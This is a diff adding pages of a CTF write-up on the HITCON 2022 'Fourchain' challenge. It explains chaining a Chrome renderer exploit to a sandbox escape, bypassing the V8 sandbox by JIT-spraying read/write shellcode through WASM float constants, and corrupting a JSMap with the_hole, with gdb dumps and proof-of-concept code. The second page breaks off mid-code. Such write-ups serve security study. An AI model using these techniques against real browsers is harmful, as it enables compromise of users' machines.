+Escaping the VM once we have a root shell inside is easy: we only need to load the exploit module from the VM escape challenge. Getting a root shell from an unsandboxed unprivileged shell is also easy because we can reuse the kernel exploit from the kernel challenge. The only part that is slightly more problematic is chaining the renderer compromise with the browser sandbox escape.
+
+The sandbox escape needs to send Mojo messages to the browser process to interact with the vulnerable IPC service. The easiest way to do that from a compromised renderer is to enable MojoJS. Using MojoJS also means that we can reuse the exploit from the sandbox escape part unmodified, which is nice because it saves us some work. There is a well-documented way to enable MojoJS in a compromised renderer with arbitrary R/W, described by Mark Brand in a [Project Zero bug](https://bugs.chromium.org/p/project-zero/issues/detail?id=1755). I reused [the code](https://github.com/google/google-ctf/blob/master/2021/quals/pwn-fullchain/healthcheck/chromium_exploit.html#L122) that I wrote for the Full Chain challenge at Google CTF 2021 for this.
+
+Now the only thing we need is arbitrary read and write in the renderer. Unfortunately we had cheesed the V8 challenge by loading the flag into the sandboxed heap with `Realm.eval` instead of actually bypassing the V8 sandbox. This was good enough for that challenge where we only had to read a file, but it won't work here. We need an actual bypass for the V8 sandbox.
+
+## Uncheesing the V8 Exploit
+
+Earlier this year DiceCTF had [a challenge](https://ctftime.org/task/18826) where players had to find bypasses for the V8 sandbox. The sandbox is now enabled by default in V8 but it's still pretty new and there are many bypasses that haven't been fixed yet. Funnily enough I had discovered the `Realm.eval` cheese when attempting to solve that challenge near the end of the CTF but I couldn't use it because the flag was located at an unguessable path. I remembered that Kylebot from Shellphish had published [a writeup](https://blog.kylebot.net/2022/02/06/DiceCTF-2022-memory-hole/) for that challenge so I started by reading it.
+
+Kylebot's bypass uses WASM and overwrites `imported_mutable_globals` in a `WasmInstance` object to get arbitrary read and write. Unfortunately this bypass [has been patched out](https://source.chromium.org/chromium/_/chromium/v8/v8.git/+/5c152a0f7b53ad24c4e103daad3cbfa94d51c29d) and doesn't work anymore in the version of V8 used in this challenge. Even then I still thought I should take a look at the `WasmInstance` because it had a lot of native pointers in Kylebot's writeup:
+
+```py
+0x12af00197ff5
+pwndbg> tele 0x12af00197ff4
+00:0000│ 0x12af00197ff4 ◂— 0x225900195f89
+01:0008│ 0x12af00197ffc ◂— 0x225900002259 /* 'Y"' */
+02:0010│ 0x12af00198004 ◂— 0x34c900002259 /* 'Y"' */
+03:0018│ 0x12af0019800c ◂— 0x34c9
+04:0020│ 0x12af00198014 ◂— 0x180010000000000
+05:0028│ 0x12af0019801c ◂— 0x10000
+06:0030│ 0x12af00198024 —▸ 0x5555569b5b60 —▸ 0x7ffffff07c60 ◂— 0x7ffffff07c60
+07:0038│ 0x12af0019802c —▸ 0x555556a1ba70 ◂— 0x500000000
+08:0040│ 0x12af00198034 ◂— 0x0
+09:0048│ 0x12af0019803c ◂— 0x0
+0a:0050│ 0x12af00198044 ◂— 0xffffffffff000000
+0b:0058│ 0x12af0019804c —▸ 0x5555569b5b40 —▸ 0x12af00000000 ◂— 0xb000
+0c:0060│ 0x12af00198054 —▸ 0x3a0e9c984000 ◂— jmp 0x3a0e9c984640 /* 0xcccccc0000063be9 */
+0d:0068│ 0x12af0019805c —▸ 0x5555569c2a48 —▸ 0x12af0005213c ◂— 0x5bd88000022c9
+0e:0070│ 0x12af00198064 —▸ 0x5555569c2a40 —▸ 0x12af000497e4 ◂— 0x0
+0f:0078│ 0x12af0019806c —▸ 0x5555569c2a68 —▸ 0x12af001c0000 ◂— 0x0
+10:0080│ 0x12af00198074 —▸ 0x5555569c2a60 —▸ 0x12af00198224 ◂— 0x0
+11:0088│ 0x12af0019807c —▸ 0x5555569b5b50 —▸ 0x7ffffff07c60 ◂— 0x7ffffff07c60
+12:0090│ 0x12af00198084 —▸ 0x5555569d7889 ◂— 0x100000000
+13:0098│ 0x12af0019808c —▸ 0x555556a270c0 ◂— 0x7fff001b7740
+14:00a0│ 0x12af00198094 ◂— 0x34c9000034c9
+15:00a8│ 0x12af0019809c ◂— 0x4958d000034c9
+16:00b0│ 0x12af001980a4 ◂— 0x182dad0004975d
+17:00b8│ 0x12af001980ac ◂— 0x23e100197fb1
+```
+
+Most of the pointers appear to be sandboxed now but there are still a few that are not. I started experimenting by overwriting each of those with 0x41414141 in GDB before calling into the wasm code and got some crashes. The most interesting one was from overwriting the pointer at offset 0x60 because it gave us RIP control:
+
+```py
+Thread 1 "d8" received signal SIGSEGV, Segmentation fault.
+0x0000000041414141 in ?? ()
+LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
+──────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────────────
+*RAX 0x13371337
+*RBX 0x7fffffffd400 —▸ 0x7fffffffd420 ◂— 0xe
+*RCX 0x555555f55631 ◂— mov rax, rbx
+*RDX 0x13381338
+*RDI 0x555556a18620 —▸ 0x555556a0fbe0 ◂— 0x0
+*RSI 0x1ccc00198735 ◂— 0x590000225900195f
+*R8 0x3e359ccb128
+*R9 0x1ccc00198735 ◂— 0x590000225900195f
+*R10 0x7ffff7fbd080
+*R11 0x7ffff7fbd090
+*R12 0x2
+ R13 0x5555569b2420 —▸ 0x1ccc00000000 ◂— 0xb000
+ R14 0x1ccc00000000 ◂— 0xb000
+*R15 0x41414141
+*RBP 0x7fffffffd428 —▸ 0x7fffffffd508 —▸ 0x7fffffffd560 —▸ 0x7fffffffd588 —▸ 0x7fffffffd5f0 ◂— ...
+*RSP 0x7fffffffd3b8 —▸ 0x5554dff10256 ◂— lea rsp, [rbp - 0x48]
+*RIP 0x41414141
+───────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────────────
+Invalid address 0x41414141
+```
+
+This is very interesting because, even though we can't directly overwrite the generated machine code (which is RWX), we can still place some controlled data there by embedding it in immediates, and then jump into the middle of an immediate by overwriting this pointer (a JIT spray attack).
+
+Interestingly, Kylebot notes in his writeup that
+
+> After a few trials, I still couldn’t let V8 to dereference this pointer. After following the trace, @adamd and I found out that the real pointer used for invoking the shellcode resides on ptmalloc heap, which is outside of the cage.
+
+It seems that this might have changed in newer versions of V8 and that this attack is now possible.
+
+The gist of the attack is that we will compile a WASM function similar to this
+
+```c
+int a(unsigned long x, unsigned long y) {
+ double g1 = 1.4501798452584495e-277;
+ double g2 = 1.4499730218924257e-277;
+ double g3 = 1.4632559875735264e-277;
+ double g4 = 1.4364759325952765e-277;
+ double g5 = 1.450128571490163e-277;
+ double g6 = 1.4501798485024445e-277;
+ double g7 = 1.4345589834166586e-277;
+ double g8 = 1.616527814e-314;
+
+ return g1 + g2 + g3 + g4 + g5 + g6 + g7 + g8;
+}
+```
+
+and choose the floating-point values so that their binary encoding is also valid machine code. By jumping into the next immediate when we run out of space we can construct an arbitrarily long instruction sequence. And since V8's WASM compiler is deterministic, we just have to add an offset to the pointer we were just overwriting to execute our sprayed shellcode.
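
As a rough illustration of how such constants can be produced, the sketch below packs up to eight bytes of machine code into the bit pattern of a double. The helper names `bytesToDouble` and `doubleToBits` are made up for this example and are not taken from the exploit. The sample bytes are the first chunk visible in the register dump of the write gadget further down (`shl rax, 0x20`, two NOPs, and a short jump into the next immediate).

```javascript
// Hypothetical helpers (not from the original exploit): convert between raw
// machine-code bytes and the float64 whose little-endian encoding they form.
function bytesToDouble(bytes) {
  if (bytes.length > 8) throw new RangeError('at most 8 bytes fit into one double');
  const view = new DataView(new ArrayBuffer(8));
  for (let i = 0; i < 8; i++) {
    // Pad short chunks with NOPs (0x90).
    view.setUint8(i, i < bytes.length ? bytes[i] : 0x90);
  }
  return view.getFloat64(0, true); // little-endian, as on x86-64
}

function doubleToBits(value) {
  const view = new DataView(new ArrayBuffer(8));
  view.setFloat64(0, value, true);
  return view.getBigUint64(0, true);
}

// shl rax, 0x20 ; nop ; nop ; jmp +0x0b
const chunk = [0x48, 0xc1, 0xe0, 0x20, 0x90, 0x90, 0xeb, 0x0b];
const constant = bytesToDouble(chunk);
console.log(constant, doubleToBits(constant).toString(16));
```

Each constant therefore carries six bytes of payload plus a two-byte short jump. Bit patterns that decode to NaN are best avoided, since NaNs are not guaranteed to survive unchanged.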
+
+By inspection in GDB we can see that the calling convention that V8 uses for WASM is register-based with 32-bit integer arguments passed in `eax`, `edx`, `ecx` and integer values are returned in `eax`. The following shellcode gives us arbitrary read and write outside of the sandbox [^1]:
+
+```nasm
+sal rdx, 32
+or rax, rdx
+mov eax, dword ptr [rax]
+ret
+
+sal rax, 32
+or rdx, rax
+mov dword ptr [rdx], ecx
+ret
+```
+
+[^1]: The reason why we use rdx, rax to read but rax, rdx to write is that if the same floating-point constant is used twice in the function, the compiler will emit a load from memory instead of an immediate. So we can't use the same sequence of instructions twice.
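
The two gadgets only move 32 bits at a time and take the address as two halves, so some glue code is needed on the JavaScript side. The following is a minimal sketch of that glue, not the code from the exploit: `rawRead32` and `rawWrite32` are hypothetical stand-ins for the hijacked WASM exports and are backed by a mock `Map` here so that the example runs on its own. The argument order follows the shellcode above: the read gadget takes (low, high) and the write gadget takes (high, low, value).

```javascript
// Mock memory standing in for the process address space (illustration only).
const mem = new Map();
const key = (hi, lo) => (BigInt(hi >>> 0) << 32n) | BigInt(lo >>> 0);

// Hypothetical stand-ins for the two hijacked WASM exports.
function rawRead32(lo, hi) {
  return (mem.get(key(hi, lo)) ?? 0) | 0; // a WASM i32 result is signed
}
function rawWrite32(hi, lo, value) {
  mem.set(key(hi, lo), value >>> 0);
}

// Split a 64-bit BigInt address into two 32-bit halves.
function split(addr) {
  const a = BigInt.asUintN(64, addr);
  return { lo: Number(a & 0xffffffffn), hi: Number(a >> 32n) };
}

function read32(addr) {
  const { lo, hi } = split(addr);
  return rawRead32(lo, hi) >>> 0; // back to an unsigned value
}
function write32(addr, value) {
  const { lo, hi } = split(addr);
  rawWrite32(hi, lo, value);
}
function read64(addr) {
  return BigInt(read32(addr)) | (BigInt(read32(addr + 4n)) << 32n);
}
function write64(addr, value) {
  const v = BigInt.asUintN(64, value);
  write32(addr, Number(v & 0xffffffffn));
  write32(addr + 4n, Number(v >> 32n));
}
```

In the real exploit every call would also have to go through a freshly patched WASM instance, for the reason described next.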
+
+All seems good now and after figuring out the offsets we can get our arbitrary read and write:
+
+```py
+Thread 1 "d8" received signal SIGSEGV, Segmentation fault.
+0x0000303536423736 in ?? ()
+LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
+──────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────────────
+ RAX 0x0
+*RBX 0x5554dff173b8 ◂— cmp eax, dword ptr [r13 + 0x220]
+*RCX 0x42424242
+*RDX 0x41414141
+*RDI 0x555556a1f080 —▸ 0x555556a1f030 ◂— 0x0
+*RSI 0x3ae300199219 ◂— 0x590000225900195f
+*R8 0x4011f608d37
+*R9 0x7fffffffd348 —▸ 0x3ae300199315 ◂— 0xc90019930100002f /* '/' */
+*R10 0x7ffff7fbd080
+*R11 0x7ffff7fbd090
+*R12 0x2
+*R13 0x5555569b2420 —▸ 0x3ae300000000 ◂— 0xb000
+*R14 0x3ae300000000 ◂— 0xb000
+*R15 0x303536423710 ◂— shl rax, 0x20 /* 0xbeb909020e0c148 */
+*RBP 0x7fffffffd390 —▸ 0x7fffffffd420 —▸ 0x7fffffffd508 —▸ 0x7fffffffd560 —▸ 0x7fffffffd588 ◂— ...
+*RSP 0x7fffffffd310 —▸ 0x5554dff10256 ◂— lea rsp, [rbp - 0x48]
+*RIP 0x303536423736 ◂— mov dword ptr [rdx], ecx /* 0xbeb909090c30a89 */
+───────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────────────
+ ► 0x303536423736 mov dword ptr [rdx], ecx
+ 0x303536423738 ret
+```
+
+Except, there is a slight problem. The code pointer that we are overwriting only seems to be used once, the first time a function in that WASM instance is called. After that it's not used anymore and the JIT spray doesn't work. This probably has to do with lazy compilation. Creating a new WASM instance every time we want to read or write *almost* works, but not quite. It seems that V8 *also* has a cache of compiled WASM bytecode, so if we attempt to create two completely different WASM modules that use the same bytecode it will only compile the code once, so the JIT spray attack only works on the first.
+
+Our solution was simply to change the WASM bytecode every time we create a new instance. We just selected some byte that didn't appear to have an effect on the shellcode when changed and wrote some JavaScript that increments that byte every time we create a new WASM instance. Very hacky but it works.
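
The idea can be sketched as follows. This is an illustration under assumptions rather than the module we actually used: the tiny hand-assembled module below only exports a function `f` that returns a constant, and `PATCH_OFFSET` points at that constant. In the real exploit the patched byte was one that did not affect the sprayed shellcode.

```javascript
// Minimal WASM module exporting f(): i32 (hand-assembled for this example).
const BASE_MODULE = new Uint8Array([
  0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00, // magic + version
  0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f,       // type section: () -> i32
  0x03, 0x02, 0x01, 0x00,                         // function section: one function of type 0
  0x07, 0x05, 0x01, 0x01, 0x66, 0x00, 0x00,       // export section: "f" = function 0
  0x0a, 0x06, 0x01, 0x04, 0x00, 0x41, 0x2a, 0x0b, // code section: i32.const 42; end
]);
const PATCH_OFFSET = 32; // index of the 0x2a immediate above

let variantCounter = 0;

// Return a copy of the module whose bytes differ from every previous copy,
// so that a cache keyed on the bytecode cannot return an old compilation.
function nextModuleBytes() {
  const bytes = BASE_MODULE.slice();
  // Stay within 0..63 so the immediate remains a one-byte, non-negative LEB128 value.
  bytes[PATCH_OFFSET] = (BASE_MODULE[PATCH_OFFSET] + variantCounter++) & 0x3f;
  return bytes;
}

function freshInstance() {
  return new WebAssembly.Instance(new WebAssembly.Module(nextModuleBytes()));
}
```

With a one-byte counter the number of distinct variants is limited (64 in this sketch), so a long-running exploit would need to vary more than one byte.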
+
+Now that we have arbitrary R/W in the renderer process we just need to leak the base of the `chrome` binary and enable MojoJS. There are probably tons of ways to do this; we used a pointer inside the WASM code page.
+
+After toggling the MojoJS flag we just have to reload the page and we will have MojoJS, so we can run the Sandbox exploit from before.
+
+The final exploit HTML can be found at the end of this page.
+
+## GUI Troubles
+
+Since we just had too much fun solving these challenges, we decided to go all out for the writeup and make the exploit work while running everything with a GUI (i.e. like a person normally would).
+In theory, of course, this should have been a cakewalk that only required us to install the GUI packages everywhere and set the corresponding settings / flags.
+Unfortunately, it was not that easy.
+
+Installing the GUI was already quite tricky and I had to set up a completely new VM for it, since installing it on my droplet resulted in all network connections being dropped.
+Setting up the new VM was awkward as well, because I wanted a VM-in-VM setup (so that I wouldn't accidentally mess up my actual system).
+This meant I had to use nested virtualization, which should be supported by VirtualBox out of the box.
+My host OS was Windows, since that was the machine I had lying around with nested virtualization supported.
+It took many restarts and convincing Windows that I did not need any kind of safety features to disable Hyper-V and get nested virtualization in VirtualBox working.
+Now I only had to get Chrome working with a GUI, which turned out to be a bit of a pain as well.
+Unfortunately, the build provided by the challenge authors was missing some necessary files, such as resources and the crash handler.
+Thankfully, Nspace had compiled the patched Chrome himself for local debugging and I was able to get the GUI working by copying over random files from his build.
+
+Once that was out of the way, I could finally start.
+After some very minor tweaking, the last two steps worked quite well again, even with the GUI.
+However, the first two stages were not working at all.
+The first stage was failing to leak the code pointer, and it turned out that the read outside the V8 sandbox was broken.
+I wasted quite some time here until I finally (grudgingly) installed gdb in the inner VM and attached to Chrome.
+It turned out that my new setup was using different instructions for compiling the WASM code (likely because it has an AMD CPU), and hence the offset used had to change.
+Once that was fixed, the first stage was working again.
+
+The second stage was still broken though and would always crash at the same place with similar register contents:
+
+```cpp
+Received signal 11 000000000000
+#0 0x55fa415d15b2 base::debug::CollectStackTrace()
+#1 0x55fa41537783 base::debug::StackTrace::StackTrace()
+#2 0x55fa415d10d1 base::debug::(anonymous namespace)::StackDumpSignalHandler()
+#3 0x7f2179098140 (/usr/lib/x86_64-linux-gnu/libpthread-2.31.so+0x1313f)
+#4 0x55fa3fd520e4 content::SandboxImpl::Pour()
+#5 0x55fa41584f81 base::TaskAnnotator::RunTaskImpl()
+#6 0x55fa4159d2cd base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::DoWorkImpl()
+#7 0x55fa4159cbbf base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::DoWork()
+#8 0x55fa4159da55 base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::DoWork()
+#9 0x55fa415f8193 base::MessagePumpEpoll::Run()
+#10 0x55fa4159ddab base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::Run()
+#11 0x55fa41563db9 base::RunLoop::Run()
+#12 0x55fa415bd098 base::Thread::Run()
+#13 0x55fa3f6d8a60 content::BrowserProcessIOThread::IOThreadRun()
+#14 0x55fa415bd1b7 base::Thread::ThreadMain()
+#15 0x55fa415e494f base::(anonymous namespace)::ThreadFunc()
+#16 0x7f217908cea7 start_thread
+#17 0x7f21780afa2f clone
+ r8: 00001b6802012300 r9: 00007f217080e06f r10: 0000000000010001 r11: 0000000000000001
+ r12: 00001b68010c7c20 r13: 0000000000000800 r14: 00001b68010c6c00 r15: efefefefefefefef
+ di: 000055fa47c6ccc8 si: 00001b6801f32300 bp: 00007f217080e140 bx: 00001b6801cc8000
+ dx: 0000000000000800 ax: 00001b6802012b20 cx: 0000000000000000 sp: 00007f217080e0f0
+ ip: 000055fa3fd520e4 efl: 0000000000010282 cgf: 002b000000000033 erf: 0000000000000000
+ trp: 000000000000000d msk: 0000000000000000 cr2: 0000000000000000
+[end of stack trace]
+Segmentation fault
+```
+
+Looking at the assembly, the culprit was R15.
+I compared the crash log to one from a run without the GUI, where the exploit would either succeed, or R15 would be null or `0x20`.
+I realized that when the GUI was enabled, there must be some UAF detection happening that memsets freed chunks to `0xef`.
+After scouring the Chromium codebase for a few hours (and wasting a lot of time trying to make it work with different timings of the race), I finally figured out that it is their new partition allocator:
+
+```cpp
+ // TODO(keishi): Add PA_LIKELY when brp is fully enabled as |brp_enabled| will
+ // be false only for the aligned partition.
+ if (brp_enabled()) {
+ auto* ref_count = internal::PartitionRefCountPointer(slot_start);
+ // If there are no more references to the allocation, it can be freed
+ // immediately. Otherwise, defer the operation and zap the memory to turn
+ // potential use-after-free issues into unexploitable crashes.
+ if (PA_UNLIKELY(!ref_count->IsAliveWithNoKnownRefs() &&
+ brp_zapping_enabled()))
+ internal::SecureMemset(object, internal::kQuarantinedByte,
+ slot_span->GetUsableSize(this));
+```
+
+I did not figure out whether this is just not enabled when running with `--headless` or the GUI just causes the memset to happen due to other factors.
+In the end, I decided to just disable the new allocator with a command line flag[^4].
+
+With all of that fixed, the exploit finally worked when running under a GUI and we were able to capture this glorious video :P (I recommend you turn on sound):
+
+
+
+[^4]: Yeah this is kinda cheating, but then again, the challenge was not made with this in mind and I also had to finish this writeup at some point :P. Also I forgot the command line flag, so if you came here looking for that, sorry :/.
+
+
+## Final Exploit HTML
+
+```html
+
+
+
+
+
+
+
+
+
+```
+
+`hitcon{G00dbY3_1_4_O_h3LL0_Pwn_2_Own_BTW_vB0x_Y_U_N0_SM3P_SM4P_??!!}`
+
+## Table of Contents
+
+- [Prologue](./fourchain-prologue): Introduction
+- [Chapter 1: Hole](./fourchain-hole): Using the "hole" to pwn the V8 heap and some delicious Swiss cheese.
+- [Chapter 2: Sandbox](./fourchain-sandbox): Pwning the Chrome Sandbox using `Sandbox`.
+- [Chapter 3: Kernel](./fourchain-kernel): Chaining the Cross-Cache Cred Change
+- [Chapter 4: Hypervisor](./fourchain-hv): Lord of the MMIO: A Journey to IEM
+- **[Chapter 5: One for All](./fourchain-fullchain) (You are here)**
+- [Epilogue](./fourchain-epilogue): Closing thoughts
\ No newline at end of file
diff --git a/HITCON-2022/pwn/fourchain-hole.html b/HITCON-2022/pwn/fourchain-hole.html
new file mode 100755
index 0000000..4db9a9b
--- /dev/null
+++ b/HITCON-2022/pwn/fourchain-hole.html
@@ -0,0 +1,676 @@
+
+
+
+
+
+Fourchain - Hole | Organisers
+
There’s a hole in the program ?
+Well I’m sure it’s not that of a big deal, after all it’s just a small hole that won’t do any damage right ?
+… Right 😨 ?
+
+
+
Analysis
+
+
NOTE: this writeup assumes some familiarity with V8 internals such as how objects are laid out in memory, pointer compression, and pointer tagging.
+
+
The challenge gives us a patched d8, built from V8 commit 63cb7fb817e60e5633fb622baf18c59da7a0a682. There are two patch files included in the challenge:
The second patch, d8_strip_global.patch is simply removing some builtin functions that programs running in d8 normally have access to. These functions let a JavaScript program do things like open and read files, and they would trivialize the challenge if our exploit could use them. This is pretty standard for V8 challenges.
+
+
The first patch, add_hole.patch, is the interesting part. It adds a new method called hole to Array.prototype. The new method is implemented as a C++ builtin, in the function ArrayHole. The function doesn’t do much, and just returns a special value called the_hole.
+
+
the_hole in V8 is a special object that the engine uses internally to represent the absence of a value. For example, when a JavaScript program creates a sparse array, V8 stores the_hole in all uninitialized array slots.
the_hole is an implementation detail that is not part of the JS standard and is normally invisible to JS code. For example if a program tries to access a slot that contains the_hole in a sparse array, the access returns undefined and not the_hole.
+
+
const a = [1, 2];
+a[9] = 3;
+console.log(a[8]);
+
+
undefined
+
+
+
The author’s patch adds a way to get a reference to this normally inaccessible object from JS code. This is interesting from a security perspective because it’s likely that many of the built-in functions don’t expect to be passed the_hole as an argument and might misbehave when that happens. For example the following snippet crashes d8:
+
+
const the_hole = [].hole();
+the_hole.toString()
+
+
+
The patch also comments out some code that references a bug in Chromium’s bug tracker. The bug describes how a reference to the_hole can be used to cause memory corruption.
+
+
+
It appears that a leaked TheHole value can be used to cause memory corruption due to special handling of TheHole values in JSMaps:
+
+
var map = new Map();
+ map.set(1, 1);
+ map.set(hole, 1);
+ // Due to special handling of hole values, this ends up setting the size of the map to -1
+ map.delete(hole);
+ map.delete(hole);
+ map.delete(1);
+
+ // Size is now -1
+ //print(map.size);
+
+ // Set values in the map, which presumably ends up corrupting data in front of
+ // the map storage due to the size being -1
+ for (let i = 0; i < 100; i++) {
+ map.set(i, 1);
+ }
+
+ // Optionally trigger heap verification if the above didn't already crash
+ //gc();
+
+
+
I haven’t verified exactly why this happens, but my guess is that because the TheHole value is used by JSMaps to indicate deleted entries [8], when the code deletes TheHole for the second time, it effectively double-deletes an entry and so decrements the size twice.
+[8] https://source.chromium.org/chromium/chromium/src/+/main:v8/src/builtins/builtins-collections-gen.cc;l=1770;drc=1c3085e26a408adb53645f9b5d12fa9f3803df3c
+
+
+
The check that the challenge author commented out was introduced in response to this bug and breaks the exploitation technique described above. This makes it pretty clear that that’s how the author wants us to solve the challenge.
+
+
Exploitation
+
+
The exploit described in the chromium bug uses the_hole to set the length of a JavaScript map to -1. In order to understand what primitives that gives us we first have to find the code that implements the map object and understand how it works.
+
+
JSMap, the C++ object that represents a JavaScript map, is declared in js-collection.tq and is basically the same as a JSCollection. JSCollection only has one field, called table, which points to the backing hash table. Sadly the field has type Object, which can point to any JavaScript object. Not very useful. Looking for references to the generated method JSCollection::table() we find some code that indicates that table is actually of type OrderedHashMap. OrderedHashMap is itself a subclass of OrderedHashTable, which has a detailed comment describing how the contents of the table are laid out in memory. Cool!
+
+
The memory layout of an OrderedHashTable (and OrderedHashMap) is this:
+
+
[0]: element count
+[1]: deleted element count
+[2]: bucket count
+[3..(3 + NumberOfBuckets() - 1)]: "hash table",
+ where each item is an offset into the
+ data table (see below) where the first
+ item in this bucket is stored.
+[3 + NumberOfBuckets()..length]: "data table", an
+ array of length Capacity() * 3,
+ where the first entrysize items are
+ handled by the derived class and the
+ item at kChainOffset is another entry
+ into the data table indicating the next
+ entry in this hash bucket.
+
+
+
In our case each element consists of two JavaScript values (the key and the value), so entrysize = 2 and each entry in the data table will be 3 words (12 bytes) long (key, value, next element).
+
+
In some circumstances the runtime can decide to declare the OrderedHashTable obsolete and create a new version. For example that can happen when too many elements are deleted from the table and the occupancy becomes too low. In that case the first word of the old table is not the element count but rather a pointer to the new OrderedHashTable. We can distinguish between the two by looking at the tag of the first word of the map. A Smi indicates that the map is active, and a pointer indicates that it’s obsolete.
+
+
The layout described above is also prefixed with a pointer to a Map object and with the overall size of the table (in words, which in this case are 4 bytes). The table’s total size is stored right after the map because OrderedHashTable derives from FixedArray, which has a length field. I am pretty sure that this is redundant because the size of the OrderedHashTable is always equal to 3 + num_buckets * 7 (three header words, one word per bucket, and two 3-word entries per bucket), but maybe it is stored explicitly to help the GC.
+
+
The value that the exploit in the Chromium bug sets to -1 is the element count (as we can see in the code here, linked to in the bug). We can verify that this is the case by running the code from the Chromium bug and then printing the memory of the map in GDB.
0x1f0400048c7d <Map map = 0x1f04001855f5>
+Thread 1 "d8" received signal SIGTRAP, Trace/breakpoint trap.
+
+pwndbg> x/4wx 0x1f0400048c7c
+ /* map properties elements table */
+0x1f0400048c7c: 0x001855f5 0x00002259 0x00002259 0x00048c8d
+pwndbg> x/4wx 0x1f0400048c8c
+ /* map length next table deleted element count */
+0x1f0400048c8c: 0x00002c29 0x00000022 0x00048cd9 0x00000004
+pwndbg> x/4wx 0x1f0400048cd8
+ /* map length next table deleted element count */
+0x1f0400048cd8: 0x00002c29 0x00000022 0x00048d25 0x00000002
+pwndbg> x/4wx 0x1f0400048d24
+ /* map length element count deleted element count */
+0x1f0400048d24: 0x00002c29 0x00000022 0xfffffffe 0x00000000
+
+
+
As we can see the element count is indeed -1 (whose tagged representation is 0xfffffffe).
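
The tagging arithmetic behind these values can be checked with a few lines of JavaScript. This is only a sketch that assumes 32-bit tagged words as in the dumps above (pointer compression with 31-bit Smis); the helper names are invented for the example.

```javascript
// A Smi stores the integer shifted left by one, so its lowest bit is 0.
// Heap pointers have the lowest bit set to 1.
const smiTag = (value) => (value << 1) >>> 0; // as an unsigned 32-bit word
const smiUntag = (word) => (word | 0) >> 1;   // arithmetic shift keeps the sign
const isSmi = (word) => (word & 1) === 0;

console.log(smiTag(-1).toString(16)); // element count of the corrupted table
console.log(smiUntag(0x22));          // the FixedArray length field from the dump
console.log(isSmi(0x00048cd9));       // first word of an obsolete table
```

Applied to the dump above, the first two tables start with a pointer (they are obsolete), while the last one starts with a Smi (it is the active table).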
+
+
Now how do we exploit this? I searched online for the CVE number referenced in the Chromium bug report (CVE-2021-38003) and found this article by Numen Cyber Labs which has some more details on how to exploit the vulnerability. The article provides a PoC exploit which sets the length of an array to 0xffff.
The way the exploit works is by overwriting the bucket count in the OrderedHashMap with 0x10, which then makes the next insertion into the map write out of bounds. To see why, let’s take a look at the code that implements map insertion. I will include a simplified and commented version here for convenience.
+
+
TF_BUILTIN(MapPrototypeSet, CollectionsBuiltinsAssembler) {
+ // ...
+
+ BIND(&add_entry);
+ TVARIABLE(IntPtrT, number_of_buckets);
+ TVARIABLE(IntPtrT, occupancy);
+ TVARIABLE(OrderedHashMap, table_var, table);
+ {
+ // Check we have enough space for the entry.
+ number_of_buckets = SmiUntag(CAST(UnsafeLoadFixedArrayElement(
+ table, OrderedHashMap::NumberOfBucketsIndex())));
+
+ static_assert(OrderedHashMap::kLoadFactor == 2);
+ // capacity = number_of_buckets * 2
+ const TNode<WordT> capacity = WordShl(number_of_buckets.value(), 1);
+ // Read the number of elements.
+ const TNode<IntPtrT> number_of_elements = SmiUntag(
+ CAST(LoadObjectField(table, OrderedHashMap::NumberOfElementsOffset())));
+ // Read the number of deleted elements.
+ const TNode<IntPtrT> number_of_deleted = SmiUntag(CAST(LoadObjectField(
+ table, OrderedHashMap::NumberOfDeletedElementsOffset())));
+ // occupancy = number_of_elements + number_of_deleted
+ occupancy = IntPtrAdd(number_of_elements, number_of_deleted);
+ GotoIf(IntPtrLessThan(occupancy.value(), capacity), &store_new_entry);
+
+ // ...
+ }
+ BIND(&store_new_entry);
+ // Store the key, value and connect the element to the bucket chain.
+ StoreOrderedHashMapNewEntry(table_var.value(), key, value,
+ entry_start_position_or_hash.value(),
+ number_of_buckets.value(), occupancy.value());
+ Return(receiver);
+}
+
+void CollectionsBuiltinsAssembler::StoreOrderedHashMapNewEntry(
+ const TNode<OrderedHashMap> table, const TNode<Object> key,
+ const TNode<Object> value, const TNode<IntPtrT> hash,
+ const TNode<IntPtrT> number_of_buckets, const TNode<IntPtrT> occupancy) {
+
+ // bucket = hash & (number_of_buckets - 1)
+ const TNode<IntPtrT> bucket =
+ WordAnd(hash, IntPtrSub(number_of_buckets, IntPtrConstant(1)));
+ // bucket_entry = table[3 + bucket]
+ // this is the index in the data table at which the bucket begins
+ TNode<Smi> bucket_entry = CAST(UnsafeLoadFixedArrayElement(
+ table, bucket, OrderedHashMap::HashTableStartIndex() * kTaggedSize));
+
+ // Store the entry elements.
+ // entry_start = occupancy * 3 + number_of_buckets
+ const TNode<IntPtrT> entry_start = IntPtrAdd(
+ IntPtrMul(occupancy, IntPtrConstant(OrderedHashMap::kEntrySize)),
+ number_of_buckets);
+
+ // table[3 + number_of_buckets + occupancy * 3] = key
+ UnsafeStoreFixedArrayElement(
+ table, entry_start, key, UPDATE_WRITE_BARRIER,
+ kTaggedSize * OrderedHashMap::HashTableStartIndex());
+ // table[3 + number_of_buckets + occupancy * 3 + 1] = value
+ UnsafeStoreFixedArrayElement(
+ table, entry_start, value, UPDATE_WRITE_BARRIER,
+ kTaggedSize * (OrderedHashMap::HashTableStartIndex() +
+ OrderedHashMap::kValueOffset));
+ // table[3 + number_of_buckets + occupancy * 3 + 2] = bucket_entry
+ UnsafeStoreFixedArrayElement(
+ table, entry_start, bucket_entry,
+ kTaggedSize * (OrderedHashMap::HashTableStartIndex() +
+ OrderedHashMap::kChainOffset));
+
+ // Update the bucket head.
+ // table[3 + bucket] = occupancy
+ UnsafeStoreFixedArrayElement(
+ table, bucket, SmiTag(occupancy),
+ OrderedHashMap::HashTableStartIndex() * kTaggedSize);
+
+ // Bump the elements count.
+ // table[0]++
+ const TNode<Smi> number_of_elements =
+ CAST(LoadObjectField(table, OrderedHashMap::NumberOfElementsOffset()));
